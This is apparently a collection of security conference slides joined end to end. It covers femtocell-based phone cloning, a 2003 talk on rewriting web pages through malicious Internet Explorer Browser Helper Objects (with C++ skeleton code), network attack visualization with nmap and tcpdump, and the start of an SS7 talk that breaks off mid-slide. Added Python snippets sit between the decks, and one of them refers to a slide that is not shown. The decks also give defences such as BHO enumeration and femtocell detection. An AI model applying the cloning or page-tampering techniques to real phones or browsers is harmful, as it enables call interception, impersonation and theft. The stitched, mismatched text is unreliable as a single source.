MEID/ESN 51 • CAVE (Cellular Authentication and Voice Encryption) • Every phone has a secret A-Key, which generates two derivative keys used to authenticate every call and message, as well as encrypt voice traffic over the air • The A-Key is never shared over the network, but the derivative keys are used for every call Enter the CAVE 52 • The femtocell acts just like any other tower, except it doesn’t actually require the MEID • ESN is used with older devices, and pESN is used instead of MEID on newer devices Connecting to a Femtocell (p)ESN, MIN 53 • The femtocell does not use MEIDs for authentication at all, only the (p)ESN and MIN • And most importantly, the femtocell didn’t require CAVE! • This means that a “classic” clone with just the (p)ESN and MIN would work - as long as the attacker’s clone is connected to a femtocell • We just need the (p)ESN and MIN of our victim Remember Your Failure At The CAVE… (p)ESN, MIN 54 • (p)ESN/MIN values are passed through the femtocell in a registration packet whenever ANY phone comes within range • This allows cloning without physical access to phone The Perfect Clone 55 The Perfect Clone Step 1: Victim phone falls in range of rooted femtocell with sniffer Step 2: MIN and ESN are collected and cloned to a target device 0x80123456 (201) 555 - 1234 Step 3: Target device is associated with a stock femtocell Step 4: Clone attained; calls and SMS can be made on behalf of original phone 56 Cloning Implications • Cloning can be flakey • Voice • The elusive 2.5-way call • SMS • Data • Not yet…. • Helpful definitions for our discussion: • Victim phone – the phone of a legitimate subscriber whose keys have been captured by a rogue femtocell • Target phone – the phone of an attacker that has been modified (cloned) to the legitimate victim phone 57 Cloning Scenario 0 When the VICTIM phone is turned off or jammed • Everything works • Incoming Call • Outgoing Call • SMS 58 Cloning Scenario 1 When both the TARGET and VICTIM phones are associated with the femtocell. • Outgoing Call • Forced drop • SMS • Incoming 59 Cloning Scenario 1 When both the TARGET and VICTIM phones are associated with the femtocell. 
60 • Incoming Call • Only one phone rings • Situation normal • Both phones ring • The race is on • “Two-and-a-half”-way call Third Party Caller’s Voice Target’s Voice Victim’s Voice Passive Association Carrier Cloning Scenario 2 When only the TARGET phone is associated to the femtocell and the VICTIM phone is on an actual Verizon tower 61 • Outgoing Call • TARGET call is dropped • Two for one! • Incoming Call and SMS • Most recent carrier contact Carrier Cloning Data • Much more difficult • Need more keys • Valid NAI • HA • AAA 62 63 Cloning Video http://www.youtube.com/watch?v=Ydo19YOzpzU Cloning: Patched The requirement for CAVE Authentication to be enabled takes place on the Carrier Network (not the femtocell). Accordingly, it was patched without requiring any software updates to the femtocell. 64 Femtocells are a Bad Idea 65 Major US Carrier Comparison Carrier Technology Femtocell? Verizon CDMA Yes Sprint CDMA Yes AT&T GSM Yes T-Mobile GSM No 66 • Harden the femtocell hardware and software • That might help except… Short Term Mitigations 67 “If an attacker has physical control over your computer… it’s not your computer anymore.” Root is always possible 68 • We got in through a serial port • JTAG / UART ports? • Reflash firmware? • Glitching Attacks? Root is always possible 69 Require phone registration • Capability currently exists Short Term Mitigations 70 Femtocell Handset Registration Vendor Tech Femtocell Requires Registration Verizon CDMA Yes No Optional per Femtocell Sprint CDMA Yes No Optional per Femtocell AT&T GSM Yes Yes! T-Mobile GSM No! Wi-Fi Calling N/A 71 Require phone registration • Capability currently exists • Protects against untargeted dragnets • Does not protect against isolation attacks Short Term Mitigations 72 • Get rid of ‘em • WiFi Calling • IPSec or SSL Tunnel • End-to-End encryption • OSTel & CSipSimple/Groundwire • RedPhone • ZRTP Long Term Mitigations 73 Fixes & Bandaids 74 • Short Term • Harden femtocell • Require registration • Long Term • No femtocells • Move to WiFi Calling • End-to-end Encryption Mitigation Summary 75 • How do I know if I’m connected to a femtocell? • Android - some phones display an icon when connected to a femtocell • Phones that Verizon modified • Not Stock Android, Not Third Party ROMs • iPhone – No visual indicator • All - Short beep at beginning of phone call (easy to miss) • But somewhere, there’s code written to detect them What Can I Do? 76 • Detects femtocells and puts you in airplane mode • http://github.com/isecp artners/femtocatcher • Thanks immensely to Mira Thambireddy 77 Announcing FemtoCatcher • End-To-End Encryption • Voice • RedPhone • OSTel • SMS / Chat • TextSecure • Gibberbot • Silent Circle • Wickr • Browsing • VPN • Tor (Android: Orbot+Orweb iOS:Onion Browser) What Else Can I Do? 78 Future Work 79 • Custom Protocols • Heavily Proxied • Forced gzip • Chunked Encoding • SSL Middling • Advertised… • …or not (Nokia) WAP (Wireless Application Protocol) 80 WAP 81 Fuzzaaaaaaaaaaaaaaaaaing • What happens when you fuzz the baseband? 
82 Internal Femtocell Network • Femtocell -> Femtocell (rsaxvc/BH2011) • Femtocell -> Internal Carrier Network (BH2011) 83 • Doug DePerry • Senior Security Engineer at iSEC Partners • @dugdep • doug@isecpartners.com • Tom Ritter • Principal Security Engineer at iSEC Partners • @TomRittervg • tritter@isecpartners.com • Thanks to • RSAXVC & Doug Kelly • Andrew Rahimi, Davis Gallinghouse, Tim Newsham • These guys did much of the hard work • Mira, Michael, Pratik, Peter Oehlert, Joel Wallenstrom, and really all of iSEC Thank You & Questions? 84
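Looping back to the voice-decoding section: the RFC 3558 table quoted on the codec slide is the piece that lets you carve EVRC frames out of the RTP payload. The sketch below only encodes that table plus a deliberately simplified walker that assumes each frame is preceded by a single rate byte; the real RFC 3558 header-free and bundled formats arrange the table of contents differently, so treat this as an illustration of the size table rather than a decoder.

Python

    # frame sizes in bytes per rate value, straight from the RFC 3558 table on the slide
    EVRC_FRAME_BYTES = {0: 0,    # blank
                        1: 2,    # 1/8 rate
                        2: 5,    # 1/4 rate (not valid for EVRC)
                        3: 10,   # 1/2 rate
                        4: 22,   # full rate
                        5: 0}    # erasure

    def walk_frames(payload):
        """Simplified: assumes <rate byte><frame bytes> repeated back to back."""
        i = 0
        while i < len(payload):
            rate = payload[i] & 0x0F
            size = EVRC_FRAME_BYTES[rate]
            yield rate, payload[i + 1 : i + 1 + size]
            i += 1 + size

    demo = bytes([4]) + bytes(22) + bytes([1]) + bytes(2)
    for rate, frame in walk_frames(demo):
        print(rate, len(frame))    # prints: 4 22, then 1 2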
(i) to hold the Disclosing Party’s Proprietary Information in confidence and to take reasonable precautions to protect such Proprietary Information (including, without limitation, all precautions the Receiving Party employs with respect to its confidential materials), (ii) not to divulge any such Proprietary Information or any information derived there from to any third person, (iii) not to make any use whatsoever at any time of such Proprietary Information except to evaluate internally its relationship with the Disclosing Party (iv) not to copy or reverse engineer any such Proprietary Information and not to export or reexport (within the meaning of U.S. or other export control laws or regulations) any such Proprietary Information or product thereof. This document is solely for the presentation of Twingo Systems. No part of it may be circulated, quoted, or reproduced for distribution without prior written approval from Twingo Systems. By reading this document, the Receiving Party agrees: Hack any website Defcon 11 – 2003 Edition - Alexis Park, Las Vegas, USA Grégoire Gentil CEO and CTO of Twingo Systems August 2, 2003 STRICTLY CONFIDENTIAL 2 (c) 2003 Twingo Systems, Confidential AGENDA • Overview of the attack • Demos • General analysis • Technical analysis • How to defend? • Conclusion • Questions and Answers 3 (c) 2003 Twingo Systems, Confidential • You can either attack the bank… WHAT CAN YOU DO WHEN YOU WANT TO STEAL MONEY? • But be careful, security can be tough • Or you can attack all the customers of the bank 4 (c) 2003 Twingo Systems, Confidential WHAT CAN YOU DO WHEN YOU WANT TO HACK A WEBSITE? • You can either attack the server… • But be careful, security can be tough Firewall, intrusion detection, anti-virus, … • This is what I will teach you today • Or you can attack all the clients 5 (c) 2003 Twingo Systems, Confidential AGENDA • Overview of the attack • Demos • General analysis • Technical analysis • How to defend? • Conclusion • Questions and Answers 6 (c) 2003 Twingo Systems, Confidential •Demo 1: Dynamic modification of the content of a webpage  Modify the homepage of a media website •Demo 2: Dynamic modification of the javascript of a webpage  Modify the features of the list view of a webmail DEMOS 7 (c) 2003 Twingo Systems, Confidential AGENDA • Overview of the attack • Demos • General analysis • Technical analysis • How to defend? • Conclusion • Questions and Answers 8 (c) 2003 Twingo Systems, Confidential • Requires Internet explorer 4.0 and Windows 95 or later  Google Zeitgeist (http://www.google.com/press/zeitgeist.html) shows that more than 90% of the Google requests come from Windows – Internet Explorer • Requires DLL registration  An executable must be run once with “Power user” privileges  Many privilege escalation and code execution from a webpage without user intervention have been discovered • As you will see through this presentation, the attack is extremely generic and can lead to a lot of malicious scenarii. SCOPE OF THE SECURITY VULNERABILITY 9 (c) 2003 Twingo Systems, Confidential ADVANTAGES OF THE ATTACK • No modification on the targeted server is required • The attack uses a feature developped by Internet Explorer!!!  Microsoft provides and supports all the required tools • The installed DLL cannot be detected by anti-virus. 
This is a standard DLL with no specific signature or whatsoever • You can “personalize” the attack for all the clients • You can attack only one client 10 (c) 2003 Twingo Systems, Confidential AGENDA • Overview of the attack • Demos • General analysis • Technical analysis • How to defend? • Conclusion • Questions and Answers 11 (c) 2003 Twingo Systems, Confidential • Implemented as COM in-process DLL and loaded by Internet Explorer. • The browser initializes the object and asks it for a certain interface. If that interface is found, Internet Explorer uses the methods provided to pass its IUnknown pointer down to the helper object • Implemented also in Explorer • See Dino Esposito article “Browser Helper Objects: The Browser the Way You Want It” in MSDN INTRODUCING BROWSER HELPER OBJECTS 12 (c) 2003 Twingo Systems, Confidential • The IObjectWithSite Interface: HRESULT SetSite( IUnknown* pUnkSite )  Receives the IUnknown pointer of the browser. The typical implementation will simply store such a pointer for further use HRESULT SetSite( IUnknown* pUnkSite ) { if ( pUnkSite != NULL ) { m_spWebBrowser2 = pUnkSite; if ( m_spWebBrowser2 ) { // Connect to the browser in order to handle events if ( ! ManageConnection( Advise ) ) MessageBox( NULL, "Error", "Error", MB_ICONERROR ); } } return S_OK; } ACCESSING THE INTERFACE OF THE BROWSER 13 (c) 2003 Twingo Systems, Confidential • The IConnectionPoint interface: HRESULT Connect( void )  To intercept the events fired by the browser, the BHO needs to connect to it via an IConnectionPoint interface and pass the IDispatch table of the functions that will handle the various events HRESULT Connect( void ) { HRESULT hr; CComPtr<IConnectionPoint> spCP; // Receives the connection point for WebBrowser events hr = m_spCPC->FindConnectionPoint( DIID_DWebBrowserEvents2, &spCP ); if ( FAILED( hr ) ) return hr; // Pass our event handlers to the container. Each time an event occurs // the container will invoke the functions of the IDispatch interface we implemented hr = spCP->Advise( reinterpret_cast<IDispatch*>(this), &m_dwCookie ); return hr; } GETTING THE BROWSER EVENTS 14 (c) 2003 Twingo Systems, Confidential STDMETHODIMP Invoke( DISPID dispidMember, REFIID riid, LCID lcid, WORD wFlags, DISPPARAMS* pDispParams, VARIANT* pvarResult, EXCEPINFO* pExcepInfo, UINT* puArgErr ) { CComPtr<IDispatch> spDisp; if ( dispidMember == DISPID_DOCUMENTCOMPLETE ) { m_spWebBrowser2 = pDispParams->rgvarg[1].pdispVal; CComPtr<IDispatch> pDisp; HRESULT hr = m_spWebBrowser2->get_Document( &pDisp ); if ( FAILED( hr ) ) break; CComQIPtr<IHTMLDocument2, &IID_IHTMLDocument2> spHTML; spHTML = pDisp; if ( spHTML ) { // Get the BODY object CComPtr<IHTMLElement> m_pBody; hr = spHTML->get_body( &m_pBody ); // Get the HTML text BSTR bstrHTMLText; hr = m_pBody->get_outerHTML( &bstrHTMLText ); // Get the URL CComBSTR url; m_spWebBrowser2->get_LocationURL( &url ); } } return S_OK; } ACCESSING THE DOCUMENT OBJECT 15 (c) 2003 Twingo Systems, Confidential • Register the DLL (regsvr32.exe myBHO.dll for instance) and create a key in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\Explorer\Browser Helper Objects with the GUID of the component  The next instance of Internet Explorer will automatically load the BHO REGISTRING AND INSTALLING THE COMPONENT 16 (c) 2003 Twingo Systems, Confidential AGENDA • Overview of the attack • Demos • General analysis • Technical analysis • How to defend? 
• Conclusion • Questions and Answers 17 (c) 2003 Twingo Systems, Confidential SOME POSSIBLE DEFENSES • Disable all or selected BHOs installed on the client  Simply Enumerate the BHOs from the registry and analyze the DLL information (see code on the DefCon CD) HKEY hkey; TCHAR szPath = “SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects”; If ( RegOpenKey( HKEY_LOCAL_MACHINE, szPath, &hkey ) == ERROR_SUCCESS ) { TCHAR szGUID[255]; LONG ret = RegEnumKey( HKEY_LOCAL_MACHINE, 0, szGUID, 255 ); Int i = 0; while ( ( ret != ERROR_NO_MORE_ITEMS ) && ( ret == ERROR_SUCCESS ) ) { // You have the BHO GUID in szGUID ret = RegEnumKey ( HKEY_LOCAL_MACHINE, i, szGUID, 255 ); i++; } } • Main drawback: Pretty painful as BHOs can be sometimes useful  Acrobat plug-in is a BHO, Google toolbar uses BHO, … 18 (c) 2003 Twingo Systems, Confidential SOME POSSIBLE OTHER DEFENSES • Microsoft could improve BHO support in coming releases of Internet Explorer  Create a tag <disableBHO> to disable all BHOs for a given web page  Implement an authentication system to disable only non approved BHOs (implementation of a tag <disableNonApprovedBHO>) 19 (c) 2003 Twingo Systems, Confidential AGENDA • Overview of the attack • Demos • General analysis • Technical analysis • How to defend? • Conclusion • Questions and Answers 20 (c) 2003 Twingo Systems, Confidential • Attack can be selective, personalized  The malicious can connect to an external website and download specific information • You should not trust what you see (especially if this is not your computer) • Use BHOWatcher to regurarly check the BHO installed on your computer CONCLUSION 21 (c) 2003 Twingo Systems, Confidential • Main contact: Gregoire Gentil CEO and CTO of Twingo Systems gregoire@twingosystems.com • Company: Twingo Systems, Inc. Provides security tool to secure the untrusted computer CONTACT INFORMATION 22 (c) 2003 Twingo Systems, Confidential AGENDA • Overview of the attack • Demos • General analysis • Technical analysis • How to defend? • Conclusion • Questions and Answers 23 (c) 2003 Twingo Systems, Confidential • If you have any question, it is the moment to ask… QUESTIONS AND ANSWERS
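The registry walk on the defense slide translates almost one-for-one into a few lines of Python, which makes for a quick audit without compiling anything. A minimal sketch, assuming it runs on the affected Windows host; note that on 64-bit systems registry redirection may hide 32-bit BHOs unless KEY_WOW64_32KEY is also checked.

Python

    import winreg

    BHO_PATH = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects"

    def list_bhos():
        """Return (GUID, DLL path) for every registered Browser Helper Object."""
        results = []
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, BHO_PATH) as key:
            index = 0
            while True:
                try:
                    guid = winreg.EnumKey(key, index)
                except OSError:             # no more subkeys
                    break
                dll = "(no InprocServer32 entry)"
                try:
                    with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT,
                                        rf"CLSID\{guid}\InprocServer32") as clsid:
                        dll = winreg.QueryValueEx(clsid, "")[0]
                except OSError:
                    pass
                results.append((guid, dll))
                index += 1
        return results

    for guid, dll in list_bhos():
        print(guid, "->", dll)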
Network Attack Visualization Greg Conti www.cc.gatech.edu/~conti Disclaimer The views expressed in this presentation are those of the author and do not reflect the official policy or position of the United States Military Academy, the Department of the Army, the Department of Defense or the U.S. Government. image: http://www.leavenworth.army.mil/usdb/standard%20products/vtdefault.htm information visualization is the use of interactive, sensory representations, typically visual, of abstract data to reinforce cognition. http://en.wikipedia.org/wiki/Information_visualization An Art Survey… http://www.artinvest2000.com/leonardo_gioconda.htm http://www.geocities.com/h2lee/ascii/monalisa.html http://www.muppetlabs.com/~breadbox/bf/ http://www.clifford.at/cfun/progex/ A B C • Helps find patterns • Helps reduce search space • Aids efficient monitoring • Enables interaction (what if) • Help prevent overwhelming the user Why InfoVis? So What? • Go Beyond the Algorithm • Help with detecting and understand some 0day attacks • Make CTF and Root Wars a Spectator Sport • Help find insider threats • Stealth might not be so stealthy • Help visually fingerprint attacks/tools What tasks do you need help with? TCP Dump Tcpdump image: http://www.bgnett.no/~giva/pcap/tcpdump.png TCPDump can be found at http://www.tcpdump.org/ Ethereal image: http://www.linux- france.org/prj/edu/archinet/AMSI/index/images/ethereal.gif Ethereal by Gerald Combs can be found at http://www.ethereal.com/ EtherApe image: http://www.solaris4you.dk/sniffersSS.html Etherape by Juan Toledo can be found at http://etherape.sourceforge.net/ Ethereal EtherApe Packet Capture Visualizations 3D TraceRoute 3D TraceRoute Developer: http://www.hlembke.de/prod/3dtraceroute/ XTraceRoute Developer: http://www.dtek.chalmers.se/~d3august/xt/ Xtraceroute basic traceroute/tracert traceroute Visualizations Intrusion Detection System Types • Host-based intrusion-detection is the art of detecting malicious activity within a single computer by using – host log information – system activity – virus scanners • A Network intrusion detection system is a system that tries to detect malicious activity such as denial of service attacks, port-scans or other attempts to hack into computers by reading all the incoming packets and trying to find suspicious patterns. http://en2.wikipedia.org/wiki/Host-based_intrusion-detection_system http://en2.wikipedia.org/wiki/Network_intrusion_detection_system Ethernet Packet Capture Parse Process Plot tcpdump (pcap, snort) Perl Perl xmgrace (gnuplot) tcpdump capture files winpcap VB VB VB System Architecture Creativity Information Visualization Mantra Overview First, Zoom & Filter, Details on Demand - Ben Shneiderman http://www.cs.umd.edu/~ben/ Overview First… Zoom and Filter… Details on Demand… Representative Current Research SequoiaView http://www.win.tue.nl/sequoiaview/ Demo Observing Intruder Behavior Dr. Rob Erbacher – Visual Summarizing and Analysis Techniques for Intrusion Data – Multi-Dimensional Data Visualization – A Component-Based Event- Driven Interactive Visualization Software Architecture http://otherland.cs.usu.edu/~erbacher/ http://otherland.cs.usu.edu/~erbacher/ Demo Operating System Fingerprinting Dr. 
David Marchette – Passive Fingerprinting – Statistics for intrusion detection http://www.mts.jhu.edu/~marchette/ Soon Tee Teoh Visualizing Internet Routing Data http://graphics.cs.ucdavis.edu/~steoh/ See also treemap basic research: http://www.cs.umd.edu/hcil/treemap-history/index.shtml Demo Worm Propagation • CAIDA • Young Hyun • David Moore • Colleen Shannon • Bradley Huffaker http://www.caida.org/tools/visualization/walrus/examples/codered/ Jukka Juslin http://www.cs.hut.fi/~jtjuslin/ Intrusion Detection and Visualization Using Perl 3D plot of: •Time •SDP (Source-Destination-Port) •Number of Packets Data stored in Perl hashes Output piped to GNUplot TCP/IP Sequence Number Generation Initial paper - http://razor.bindview.com/publish/papers/tcpseq/print.html Follow-up paper - http://lcamtuf.coredump.cx/newtcp/ Linux 2.2 TCP/IP sequence numbers are not as good as they might be, but are certainly adequate, and attack feasibility is very low. Michal Zalewski x[n] = s[n-2] - s[n-3] y[n] = s[n-1] - s[n-2] z[n] = s[n] - s[n-1] High Speed Data Flow Visualization Therminator technology watches the data stream and illustrates categories of data as colored bars that are proportional in height to the quantity of data at a given time. The process is repeated to form a stacked bar graph that moves across a computer screen to show current and past data traffic composition. http://www.fcw.com/fcw/articles/2002/1209/web-nsa-12-13-02.asp Haptic and Visual Intrusion Detection NIVA System • Craig Scott • Kofi Nyarko • Tanya Capers • Jumoke Ladeji-Osias http://portal.acm.org/citation.cfm?id=952873&dl=ACM&coll=GUIDE Team Name Team Score Hacking Rank Count of services Entire slide from: www.toorcon.org/slides/rootfu-toorcon.ppt Atlas of Cyber Space http://www.cybergeography.org/atlas/atlas.html Honeynets John Levine • The Use of Honeynets to Detect Exploited Systems Across Large Enterprise Networks • Interesting look at detecting zero-day attacks http://users.ece.gatech.edu/~owen/Research/Conference%20Publications/honeynet_IAW2003.pdf [Charts: scan counts observed on the Georgia Tech Honeynet over time; Port 135 MS BLASTER scans per day, 5/20/2003 to 9/9/2003, Date Public: 7/16/03, Date Attack: 8/11/03. Source: John Levine, Georgia Tech] Hot Research Areas… • visualizing vulnerabilities • visualizing IDS alarms (NIDS/HIDS) • visualizing worm/virus propagation • visualizing routing anomalies • visualizing large volume computer network logs • visual correlations of security events • visualizing network traffic for security • visualizing attacks in near-real-time • security visualization at line speeds • dynamic attack tree creation (graphic) • forensic visualization http://www.cs.fit.edu/~pkc/vizdmsec04/ More Hot Research Areas… • feature selection and construction • incremental/online 
learning • noise in the data • skewed data distribution • distributed mining • correlating multiple models • efficient processing of large amounts of data • correlating alerts • signature and anomaly detection • forensic analysis http://www.cs.fit.edu/~pkc/vizdmsec04/ One Approach… • Look at TCP/IP Protocol Stack Data (particularly header information) • Find interesting visualizations • Throw some interesting traffic at them • See what they can detect • Refine Information Available On and Off the Wire • Levels of analysis • External data – Time – Size – Protocol compliance – Real vs. Actual Values • Matrices of options • Header slides http://ai3.asti.dost.gov.ph/sat/levels.jpg Ethernet: http://www.itec.suny.edu/scsys/vms/OVMSDOC073/V73/6136/ZK-3743A.gif Link Layer (Ethernet) Network Layer (IP) Examining Available Data… Transport Layer (TCP) Transport Layer (UDP) IP: http://www.ietf.org/rfc/rfc0791.txt TCP: http://www.ietf.org/rfc/rfc793.txt UDP: http://www.ietf.org/rfc/rfc0768.txt Grace “Grace is a WYSIWYG 2D plotting tool for the X Window System and M*tif. Grace runs on practically any version of Unix-like OS. As well, it has been successfully ported to VMS, OS/2, and Win9*/NT/2000/XP” http://plasma-gate.weizmann.ac.il/Grace/ Parallel Plot Target Machine’s Ports Remote Machine’s Ports Results Example 1 - Baseline with Normal Traffic Example 2 - Port Scan Example 3 - Port Scan “Fingerprinting” Example 4 - Vulnerability Scanner Example 5 - Wargame Example 1: Baseline External Port Internal Port External IP Internal IP Example 2 - PortScan Defender Attacker nmap 3.00 default (RH 8.0) nmap 3.00 udp scan (RH 8.0) Superscan 3.0 Nmap Win 1.3.1 Example 3- PortScan “Fingerprinting” nmap 3 (RH8) NMapWin 3 (XP) SuperScan 3.0 (XP) SuperScan 4.0 (XP) nmap 3 UDP (RH8) nmap 3.5 (XP) scanline 1.01 (XP) nikto 1.32 (XP) Demo Exploring nmap 3.0 in depth (port to IP to IP to port) default (root) stealth FIN (-sF) NULL (-sN) SYN (-sS -O) stealth SYN (-sS) CONNECT (-sT) UDP (-sU) XMAS (-sX) nmap within Nessus (port to IP to IP to port) CONNECT (-sT) UDP (-sU) Nessus 2.0.10 Codebase Evolution SuperScan 3.0 scanline 1.01 SuperScan 4.0 Three Parallel Scans WinNMap SuperScan 4.0 Example 4: Vulnerability Scanner Nessus 2.0.10 Sara 5.0.3 Light Medium Heavy Example 5: Wargame Demo Findings (Strengths) • Tools can be fingerprinted • Threading / multiple processes visible • OS/Application features visible • Sequence of ports scanned visible • Useful against slow scans • Useful against distributed scans Findings (Weaknesses) • Spoofing • Interaction with personal firewalls • Countermeasures • Scale / Labeling are issues • Occlusion is a problem • Greater interactivity required for forensics and less aggressive attacks • Some tools are very flexible • Source code not available for some tools Future • Active scanning, visualization of Nmap results • Real-time vs. Offline • Interesting datasets • Honeypot Fingerprinting • Other visualization techniques • Visualization of protocol attacks • Visualization of application layer attacks • Visualization of physical layer attacks (?) 
• Code up some stand-alone tools Where to go for more information… • www.rumint.com - for latest version of tool • Course websites – http://www.cc.gatech.edu/classes/AY2004/cs7450_spring/detailref.html – http://people.cs.vt.edu/~north/infoviz/ – http://graphics.stanford.edu/courses/cs448b-04-winter/ – http://www.otal.umd.edu/Olive/ More Information Information Visualization • Envisioning Information by Tufte • The Visual Display of Quantitative Information by Tufte • Visual Explanations by Tufte • Information Visualization by Spence • Information Visualization: Using Vision to Think by Card • See also the Tufte road show, details at www.edwardtufte.com images: www.amazon.com What’s on the CD • rumint visualization tool • tcpdump | perl | xmgrace – howto – sample scripts • gallery of classic visualizations (w/links) • webpage with security infovis links • this talk Acknowledgements • 404.se2600 – icer – StricK – Rockit – Hendrick – Clint • Kulsoom Abdullah – http://www.prism.gatech.edu/~gte369k/csc/ • Dr. John Stasko – http://www.cc.gatech.edu/~john.stasko/ • Dr. Wenke Lee – http://www.cc.gatech.edu/~wenke/ Questions? http://carcino.gen.nz/images/index.php/04980e0b/53c55ca5 Backup Slides Data Format • tcpdump outputs somewhat verbose output 09:02:01.858240 0:6:5b:4:20:14 0:5:9a:50:70:9 62: 10.100.1.120.4532 > 10.1.3.0.1080: tcp 0 (DF) • parse.pl cleans up output 09 02 01 858240 0:6:5b:4:20:14 0:5:9a:50:70:9 10.100.1.120.4532 10.100.1.120 4532 10.1.3.0.1080 10.1.3.0 1080 tcp • analyze.pl extracts/formats for Grace. 0 4532 1 1080 0 4537 1 1080 0 2370 1 1080 Required Files Perl, tcpdump and grace need to be installed. - http://www.tcpdump.org/ - http://www.perl.org/ - http://plasma-gate.weizmann.ac.il/Grace/ to install grace... Download RPMs (or source) ftp://plasma-gate.weizmann.ac.il/pub/grace/contrib/RPMS The files you want grace-5.1.14-1.i386.rpm pdflib-4.0.3-1.i386.rpm Install #rpm -i pdflib-4.0.3-1.i386.rpm #rpm -i grace-5.1.14-1.i386.rpm Hello World Example # tcpdump -lnnq -c10 | perl parse.pl | perl analyze.pl > outfile.dat # xmgrace outfile.dat & Optionally you can run xmgrace with an external format language file… # xmgrace outfile.dat -batch formatfile See ppt file for more detailed howto information Hello World Example (cont) Optionally you can run xmgrace with an external format language file… xmgrace outfile.dat -batch formatfile formatfile is a text file that pre-configures Grace e.g. title "Port Scan Against Single Host" subtitle "Superscan w/ports 1-1024" yaxis label "Port" yaxis label place both yaxis ticklabel place both xaxis ticklabel off xaxis tick major off xaxis tick minor off autoscale To Run Demo See readme.txt Two demo scripts… – runme.bat (uses sample dataset) – runme_sniff.bat (performs live capture, must be root) Note: you must modify the IP address variable in the Analyzer script. 
(See analyzer2.pl for example) Example 1 - Baseline • Normal network traffic – FTP, HTTP, SSH, ICMP… • Command Line – Capture Raw Data • tcpdump -l -nnqe -c 1000 tcp or udp | perl parse.pl > exp1_outfile.txt – Run through Analysis Script • cat exp1_outfile.txt | perl analyze_1a.pl > output1a.dat – Open in Grace • xmgrace output1a.dat & Example 1 - Baseline Target Machine’s Ports Remote Machine’s Ports Example 2 - PortScan • Light “normal” network traffic (HTTP) • Command Line – Run 2a.bat (chmod +x 2a.bat) echo running experiment 2 echo 1-1024 port scan tcpdump -l -nnqe -c 1200 tcp or udp > raw_outfile_2.txt cat raw_outfile_2.txt | perl parse_2a.pl > exp2_outfile.txt cat exp2_outfile.txt | perl analyze_2a.pl > output_2a.dat xmgrace output_2a.dat & echo experiment 2 completed Example 3- PortScan “Fingerprinting” Tools Examined: •Nmap Win 1.3.1 (on top of Nmap 3.00) XP Attacker (http://www.insecure.org/nmap/) •Nmap 3.00 RH 8.0 Attacker (http://www.insecure.org/nmap/) •Superscan 3.0 RH 8.0 Attacker (http://www.foundstone.com/index.htm?subnav=resources/navigation.ht m&subcontent=/resources/proddesc/superscan.htm) Example 4: Vulnerability Scanner • Attacker: RH 8.0 running Nessus 2.0.10 • Target: RH 9.0 Example 5: Wargame • Attackers: NSA Red Team • Defenders: US Service Academies Defenders lock down network, but must provide certain services Dataset - http://www.itoc.usma.edu/cdx/2003/logs.zip
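The backup slides describe the tcpdump | parse.pl | analyze.pl pipeline only through its sample output. As a rough stand-in for that stage (not the Perl scripts shipped on the CD), the Python sketch below pulls the source and destination ports out of tcpdump -lnnq lines and prints the axis/port pairs that Grace then draws as parallel coordinates; the exact output layout and the script name are assumptions based on the sample shown in the Data Format slide.

#!/usr/bin/env python3
# Illustrative stand-in for the parse.pl/analyze.pl stage (assumed output format).
# Usage: tcpdump -lnnq -c10 tcp or udp | python3 ports_for_grace.py > outfile.dat
import re
import sys

# Matches "src_ip.src_port > dst_ip.dst_port:" in tcpdump's quiet output,
# e.g. "10.100.1.120.4532 > 10.1.3.0.1080: tcp 0 (DF)"
FLOW = re.compile(r"(\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+):")

for line in sys.stdin:
    m = FLOW.search(line)
    if not m:
        continue  # skip ARP, truncated lines, etc.
    src_port, dst_port = m.group(2), m.group(4)
    # One packet becomes one segment in the parallel plot:
    # x=0 carries the remote port, x=1 the target port.
    print(0, src_port)
    print(1, dst_port)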
pdf
Attacks you can’t combat: Vulnerabilities of most robust mobile operators Sergey Puzankov About me Telecom 7+ years in telecom security 18+ years in telecom industry Security Knowledge sharing Research results & community contribution @xigins sergey_puzankov spuzankov@ptsecurity.com SS7 basics SS7 (Signaling System No. 7) is a set of telephony protocols used to set up and tear down telephone calls, send and receive SMS messages, provide subscriber mobility, and more. Ø  Fixed telephony Ø  2G/3G mobile networks Ø  Interconnection with next- generation networks Who are potential targets? © GSMA Intelligence 2018, Mobile connections by technology https://www.gsmaintelligence.com/research/2018/02/infographic-mobile-connections-by-technology/656/ 5 Now what can a Hacker do? Easily From anywhere Any mobile operator No special skills needed Get access to your email and social media Track location of VIPs and public figures Perform massive denial of service attacks Intercept private data, calls and SMS messages Steal money Take control of your digital identity History of signaling security SS7 development Trusted environment. No security mechanisms in the protocol stack. SIGTRAN (SS7 over IP) introduced. Security is still missing. Scope grows Growing number of SS7 connections, increasing amount of SS7 traffic. No security policies or restrictions. Not trusted anymore Huge number of MNOs, MVNOs, and VAS providers. SS7 widely used, Diameter added and spreading. Still not enough security. Mobile operators and SS7 security Security assessment Signaling IDS SMS Home Routing Security configuration SS7 firewall Basic nodes and identifiers HLR — Home Location Register MSC/VLR — Mobile Switching Center and Visited Location Register SMS-C — SMS Centre MSISDN — Mobile Subscriber Integrated Services Digital Number IMSI — International Mobile Subscriber Identity STP — Signaling Transfer Point GT — Global Title, address of a core node element SS7 protocol stack SCCP TCAP MAP Signaling Connection Control Part is responsible for the routing of a signaling message by Global Titles. Transaction Capabilities Application Part is responsible for transactions and dialogues processing. Mobile Application Part is payload that contains an operation code and appropriate parameters such as IMSI, profile information, and location data. SS7 security means SS7 firewall is the most sophisticated signaling security tool that protects the network against a wide range of threats such as IMSI disclosure, location tracking, and traffic interception. SMS Home Routing is intended to prevent SMS fraud and hide IMSI identities. Signaling Transfer Point makes simple screening of signaling messages. Signaling Transfer Point Ø  Signaling Transfer Point is a router that relays SS7 messages between signaling end-points and other signaling transfer points. Ø  Usually the STP is a border point in a signaling network. Ø  It is possible to use the STP for the screening of the ineligible signaling traffic. Ø  Screening rules of the most STPs are simple, for instance, blocking a signaling message by a source address or redirecting a signaling message by an operation code. Ø  The STP looks through a signaling message layer by layer and applies a rule as soon as the first appropriate pattern is triggered. SMS delivery process STP MSC 1. SRI4SM Request •  MSISDN 1. SRI4SM Request •  MSISDN 2. SRI4SM Response •  IMSI •  MSC Address 2. SRI4SM Response •  IMSI •  MSC Address 3. MT-SMS • 